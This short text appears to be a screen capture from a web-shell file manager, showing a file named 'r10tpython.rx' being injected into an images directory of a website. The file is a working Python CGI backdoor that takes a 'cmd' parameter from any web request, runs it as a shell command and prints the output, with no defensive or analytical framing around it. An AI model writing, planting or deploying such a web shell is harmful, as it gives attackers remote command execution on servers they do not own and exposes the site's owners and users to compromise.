File Manager V1.5

[SYSTEM@ROOT]: /home/risesoft/mrbeagle.risesoft.com.br/images/r10tapi/
INJECT_FILE:
NEW_ENTRY:

FILE_CONTENT: r10tpython.rx

#!/usr/bin/env python3
import cgi, subprocess
print("Content-Type: text/plain\n")
form = cgi.FieldStorage()
cmd = form.getfirst("cmd","")
if cmd:
    cmd = cmd.replace("\n","").replace("\r","")
    result = subprocess.getoutput(cmd)
    print(result)
[ KEMBALI ]